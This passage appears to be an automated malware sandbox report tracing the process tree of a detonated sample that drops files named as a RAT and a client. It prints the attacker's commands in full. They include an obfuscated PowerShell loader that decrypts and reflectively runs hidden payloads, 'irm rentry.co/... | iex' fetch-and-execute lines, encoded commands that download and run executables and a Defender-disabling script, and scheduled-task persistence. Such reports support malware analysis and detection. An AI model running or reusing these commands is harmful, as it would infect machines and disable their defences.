$bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:2412
      - C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        6⤵
        Executes dropped EXE
        
        PID:2496
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        7⤵
        Executes dropped EXE
        
        PID:1172
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        8⤵
        Executes dropped EXE
        
        PID:2072
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        9⤵
        Executes dropped EXE
        
        PID:4396
        
        C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        10⤵
        Executes dropped EXE
        
        PID:5416
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        10⤵
        Executes dropped EXE
        
        PID:5444
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        10⤵
        Executes dropped EXE
        
        PID:5536
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        9⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2684
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm rentry.co/microsoft-vir/raw | iex"
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:5864
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm rentry.co/microsoft-vir/raw | iex"
        11⤵
        Blocklisted process makes network request
        
        PID:6084
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABzAGUAdAB0AGkAbgBnAHMAIAA9ACAAJwB7ACIAVwBEACIAOgAgAGYAYQBsAHMAZQAsACAAIgBhAGQAbQBpAG4AcgB1AG4AIgA6ACAAZgBhAGwAcwBlAH0AJwAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsAJAByAGEAbgBkAG8AbQBTAHQAcgBpAG4AZwAgAD0AIAAiAG8AaQBjAHEAUgBYAEcAaABjAGUAIgA7AGkAZgAgACgAJABzAGUAdAB0AGkAbgBnAHMALgBXAEQAKQAgAHsAJABzAGUAdAB0AGkAbgBnAHMALgBhAGQAbQBpAG4AcgB1AG4AIAA9ACAAJAB0AHIAdQBlADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBuAGkAbgBoAHAAbgAxADMAMwA3AC8ARABpAHMAYQBiAGwAZQAtAFcAaQBuAGQAbwB3AHMALQBEAGUAZgBlAG4AZABlAHIALwBtAGEAaQBuAC8AcwBvAHUAcgBjAGUALgBiAGEAdAAnACwAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AVwBhAGkAdAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AOwBpAGYAIAAoACQAcwBlAHQAdABpAG4AZwBzAC4AYQBkAG0AaQBuAHIAdQBuACkAIAB7ACQAdQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZwBpAHQAaAB1AGIALgBjAG8AbQAvAGUAcQA0ADQALwBkAC8AcgBhAHcALwBtAGEAaQBuAC8AdwB6AGMAcwB0AGEAdAB1AHMALgBlAHgAZQAnADsAJABvAHUAdABwAHUAdABQAGEAdABoACAAPQAgACQAZQBuAHYAOgBUAEUATQBQACAAKwAgACcAXAAnACAAKwAgACcAdwB6AGMAcwB0AGEAdAB1AHMALgBlAHgAZQAnADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAdQByAGwALAAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AZQBsAHMAZQAgAHsAJAB1AHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AZQBxADQANAAvAGQALwByAGEAdwAvAG0AYQBpAG4ALwB3AHoAYwBzAHQAYQB0AHUAcwAuAGUAeABlACcAOwAkAG8AdQB0AHAAdQB0AFAAYQB0AGgAIAA9ACAAJABlAG4AdgA6AFQARQBNAFAAIAArACAAJwBcACcAIAArACAAJwB3AHoAYwBzAHQAYQB0AHUAcwAuAGUAeABlACcAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1AHIAbAAsACAAJABvAHUAdABwAHUAdABQAGEAdABoACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABvAHUAdABwAHUAdABQAGEAdABoADsAfQA=
        12⤵
        
        PID:5320
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "wzcdetect" /tr '"C:\Users\Admin\AppData\Roaming\wzcdetect.exe"' & exit
        10⤵
        
        PID:5988
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "wzcdetect" /tr '"C:\Users\Admin\AppData\Roaming\wzcdetect.exe"'
        11⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:6116
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpB298.tmp.bat""
        10⤵
        
        PID:5264
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        11⤵
        
        PID:4876
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        11⤵
        Delays execution with timeout.exe
        
        PID:4396
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        9⤵
        Executes dropped EXE
        
        PID:3828
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2840
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm rentry.co/microsoft-vir/raw | iex"
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:240
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm rentry.co/microsoft-vir/raw | iex"
        10⤵
        Blocklisted process makes network request
        System Location Discovery: System Language Discovery
        
        PID:5204
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABzAGUAdAB0AGkAbgBnAHMAIAA9ACAAJwB7ACIAVwBEACIAOgAgAGYAYQBsAHMAZQAsACAAIgBhAGQAbQBpAG4AcgB1AG4AIgA6ACAAZgBhAGwAcwBlAH0AJwAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsAJAByAGEAbgBkAG8AbQBTAHQAcgBpAG4AZwAgAD0AIAAiAG8AaQBjAHEAUgBYAEcAaABjAGUAIgA7AGkAZgAgACgAJABzAGUAdAB0AGkAbgBnAHMALgBXAEQAKQAgAHsAJABzAGUAdAB0AGkAbgBnAHMALgBhAGQAbQBpAG4AcgB1AG4AIAA9ACAAJAB0AHIAdQBlADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBuAGkAbgBoAHAAbgAxADMAMwA3AC8ARABpAHMAYQBiAGwAZQAtAFcAaQBuAGQAbwB3AHMALQBEAGUAZgBlAG4AZABlAHIALwBtAGEAaQBuAC8AcwBvAHUAcgBjAGUALgBiAGEAdAAnACwAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AVwBhAGkAdAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AOwBpAGYAIAAoACQAcwBlAHQAdABpAG4AZwBzAC4AYQBkAG0AaQBuAHIAdQBuACkAIAB7ACQAdQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZwBpAHQAaAB1AGIALgBjAG8AbQAvAGUAcQA0ADQALwBkAC8AcgBhAHcALwBtAGEAaQBuAC8AdwB6AGMAcwB0AGEAdAB1AHMALgBlAHgAZQAnADsAJABvAHUAdABwAHUAdABQAGEAdABoACAAPQAgACQAZQBuAHYAOgBUAEUATQBQACAAKwAgACcAXAAnACAAKwAgACcAdwB6AGMAcwB0AGEAdAB1AHMALgBlAHgAZQAnADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAdQByAGwALAAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AZQBsAHMAZQAgAHsAJAB1AHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AZQBxADQANAAvAGQALwByAGEAdwAvAG0AYQBpAG4ALwB3AHoAYwBzAHQAYQB0AHUAcwAuAGUAeABlACcAOwAkAG8AdQB0AHAAdQB0AFAAYQB0AGgAIAA9ACAAJABlAG4AdgA6AFQARQBNAFAAIAArACAAJwBcACcAIAArACAAJwB3AHoAYwBzAHQAYQB0AHUAcwAuAGUAeABlACcAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1AHIAbAAsACAAJABvAHUAdABwAHUAdABQAGEAdABoACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABvAHUAdABwAHUAdABQAGEAdABoADsAfQA=
        11⤵
        
        PID:2936
        
        C:\Users\Admin\AppData\Local\Temp\wzcstatus.exe
        
        "C:\Users\Admin\AppData\Local\Temp\wzcstatus.exe"
        12⤵
        Executes dropped EXE
        
        PID:5704
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "wzcdetect" /tr '"C:\Users\Admin\AppData\Roaming\wzcdetect.exe"' & exit
        9⤵
        
        PID:2836
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "wzcdetect" /tr '"C:\Users\Admin\AppData\Roaming\wzcdetect.exe"'
        10⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:5228
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpA682.tmp.bat""
        9⤵
        
        PID:5480
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        10⤵
        Delays execution with timeout.exe
        
        PID:5608
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        8⤵
        Executes dropped EXE
        
        PID:3988
        
        C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2100
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm rentry.co/microsoft-vir/raw | iex"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2740
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm rentry.co/microsoft-vir/raw | iex"
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:844
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABzAGUAdAB0AGkAbgBnAHMAIAA9ACAAJwB7ACIAVwBEACIAOgAgAGYAYQBsAHMAZQAsACAAIgBhAGQAbQBpAG4AcgB1AG4AIgA6ACAAZgBhAGwAcwBlAH0AJwAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsAJAByAGEAbgBkAG8AbQBTAHQAcgBpAG4AZwAgAD0AIAAiAG8AaQBjAHEAUgBYAEcAaABjAGUAIgA7AGkAZgAgACgAJABzAGUAdAB0AGkAbgBnAHMALgBXAEQAKQAgAHsAJABzAGUAdAB0AGkAbgBnAHMALgBhAGQAbQBpAG4AcgB1AG4AIAA9ACAAJAB0AHIAdQBlADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBuAGkAbgBoAHAAbgAxADMAMwA3AC8ARABpAHMAYQBiAGwAZQAtAFcAaQBuAGQAbwB3AHMALQBEAGUAZgBlAG4AZABlAHIALwBtAGEAaQBuAC8AcwBvAHUAcgBjAGUALgBiAGEAdAAnACwAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AVwBhAGkAdAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AOwBpAGYAIAAoACQAcwBlAHQAdABpAG4AZwBzAC4AYQBkAG0AaQBuAHIAdQBuACkAIAB7ACQAdQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZwBpAHQAaAB1AGIALgBjAG8AbQAvAGUAcQA0ADQALwBkAC8AcgBhAHcALwBtAGEAaQBuAC8AdwB6AGMAcwB0AGEAdAB1AHMALgBlAHgAZQAnADsAJABvAHUAdABwAHUAdABQAGEAdABoACAAPQAgACQAZQBuAHYAOgBUAEUATQBQACAAKwAgACcAXAAnACAAKwAgACcAdwB6AGMAcwB0AGEAdAB1AHMALgBlAHgAZQAnADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAdQByAGwALAAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AZQBsAHMAZQAgAHsAJAB1AHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AZQBxADQANAAvAGQALwByAGEAdwAvAG0AYQBpAG4ALwB3AHoAYwBzAHQAYQB0AHUAcwAuAGUAeABlACcAOwAkAG8AdQB0AHAAdQB0AFAAYQB0AGgAIAA9ACAAJABlAG4AdgA6AFQARQBNAFAAIAArACAAJwBcACcAIAArACAAJwB3AHoAYwBzAHQAYQB0AHUAcwAuAGUAeABlACcAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJAB1AHIAbAAsACAAJABvAHUAdABwAHUAdABQAGEAdABoACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABvAHUAdABwAHUAdABQAGEAdABoADsAfQA=
        10⤵
        
        PID:3168
        
        C:\Users\Admin\AppData\Local\Temp\wzcstatus.exe
        
        "C:\Users\Admin\AppData\Local\Temp\wzcstatus.exe"
        11⤵
        Executes dropped EXE
        
        PID:716
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "wzcdetect" /tr '"C:\Users\Admin\AppData\Roaming\wzcdetect.exe"' & exit
        8⤵
        
        PID:428
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "wzcdetect" /tr '"C:\Users\Admin\AppData\Roaming\wzcdetect.exe"'
        9⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:3164
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp9D0C.tmp.bat""
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:4892
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        9⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:3380
        
        C:\Users\Admin\AppData\Roaming\wzcdetect.exe
        
        "C:\Users\Admin\AppData\Roaming\wzcdetect.exe"
        9⤵
        Executes dropped EXE
        
        PID:5572
        
        C:\Users\Admin\AppData\Local\Temp\sihost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\sihost.exe"
        7⤵
        Executes dropped EXE
        
        PID:5084
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\cxc.bat" "
        5⤵
        
        PID:4936
      - C:\Windows\system32\net.exe
        
        net file
        6⤵
        
        PID:3436
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 file
        7⤵
        
        PID:2684
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('B+SBb9nMlcptedLlwHls5n3zB58QaIA6RJiD5dfgWIk='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('XAHyUi12Hi0GcaikprpE4Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $AVtQZ=New-Object System.IO.MemoryStream(,$param_var); $puhlZ=New-Object System.IO.MemoryStream; $bnJJi=New-Object System.IO.Compression.GZipStream($AVtQZ, [IO.Compression.CompressionMode]::Decompress); $bnJJi.CopyTo($puhlZ); $bnJJi.Dispose(); $AVtQZ.Dispose(); $puhlZ.Dispose(); $puhlZ.ToArray();}function execute_function($param_var,$param2_var){ $UgPla=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $XTeIB=$UgPla.EntryPoint; $XTeIB.Invoke($null, $param2_var);}$GZyeB = 'C:\Users\Admin\AppData\Local\Temp\cxc.bat';$host.UI.RawUI.WindowTitle = $GZyeB;$nPQuF=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($GZyeB).Split([Environment]::NewLine);foreach ($pSPiG in $nPQuF) { if ($pSPiG.StartsWith(':: ')) { $qzahh=$pSPiG.Substring(3); break; }}$payloads_var=[string[]]$qzahh.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4604
    - - C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        5⤵
        Executes dropped EXE
        
        PID:2924
      - C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RoboterXRAT V5.exe"
        6⤵
        Executes dropped EXE
        
        PID:2896
      - C:\Users\Admin\AppData\Local\Temp\WeedClient.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WeedClient.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4440
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c powershell "irm rentry.co/microsoft-vir/raw | iex"
        7⤵
        
        PID:2344
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell "irm rentry.co/microsoft-vir/raw | iex"
        8⤵
        Blocklisted process makes network request
        System Location Discovery: System Language Discovery
        
        PID:424
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -e JABzAGUAdAB0AGkAbgBnAHMAIAA9ACAAJwB7ACIAVwBEACIAOgAgAGYAYQBsAHMAZQAsACAAIgBhAGQAbQBpAG4AcgB1AG4AIgA6ACAAZgBhAGwAcwBlAH0AJwAgAHwAIABDAG8AbgB2AGUAcgB0AEYAcgBvAG0ALQBKAHMAbwBuADsAJAByAGEAbgBkAG8AbQBTAHQAcgBpAG4AZwAgAD0AIAAiAG8AaQBjAHEAUgBYAEcAaABjAGUAIgA7AGkAZgAgACgAJABzAGUAdAB0AGkAbgBnAHMALgBXAEQAKQAgAHsAJABzAGUAdAB0AGkAbgBnAHMALgBhAGQAbQBpAG4AcgB1AG4AIAA9ACAAJAB0AHIAdQBlADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaAB1AGIAdQBzAGUAcgBjAG8AbgB0AGUAbgB0AC4AYwBvAG0ALwBuAGkAbgBoAHAAbgAxADMAMwA3AC8ARABpAHMAYQBiAGwAZQAtAFcAaQBuAGQAbwB3AHMALQBEAGUAZgBlAG4AZABlAHIALwBtAGEAaQBuAC8AcwBvAHUAcgBjAGUALgBiAGEAdAAnACwAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACkAOwBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABFAE0AUAAgACsAIAAnAFwAJwAgACsAIAAkAHIAYQBuAGQAbwBtAFMAdAByAGkAbgBnACAAKwAgACcALgBiAGEAdAAnACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0AVwBhAGkAdAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AOwBpAGYAIAAoACQAcwBlAHQAdABpAG4AZwBzAC4AYQBkAG0AaQBuAHIAdQBuACkAIAB7ACQAdQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AZwBpAHQAaAB1AGIALgBjAG8AbQAvAGUAcQA0ADQALwBkAC8AcgBhAHcALwBtAGEAaQBuAC8AdwB6AGMAcwB0AGEAdAB1AHMALgBlAHgAZQAnADsAJABvAHUAdABwAHUAdABQAGEAdABoACAAPQAgACQAZQBuAHYAOgBUAEUATQBQACAAKwAgACcAXAAnACAAKwAgACcAdwB6AGMAcwB0AGEAdAB1AHMALgBlAHgAZQAnADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAdQByAGwALAAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAApADsAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgACQAbwB1AHQAcAB1AHQAUABhAHQAaAAgAC0AVgBlAHIAYgAgAFIAdQBuAEEAcwA7AH0AZQBsAHMAZQAgAHsAJAB1AHIAbAAgAD0AIAAnAGgAdAB0AHAAcwA6AC8ALwBnAGkAdABoAHUAYgAuAGMAbwBtAC8AZQBxADQANAAvAGQALwByAGEAdwAvAG0AYQBpAG4ALwB3AHoAYwBzAHQAYQB0AHUAcwAuAGUAeABlACcAOwAkAG8AdQB0AHAAdQB0AFAAYQB0AGgAIAA9ACAAJABlAG4AdgA6AFQARQBNAFAAIAArACAAJwBcACcAIAArACAAJwB3AHoAYwBzAHQAYQB0AHUAcwAuAGUAeABlACcAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4A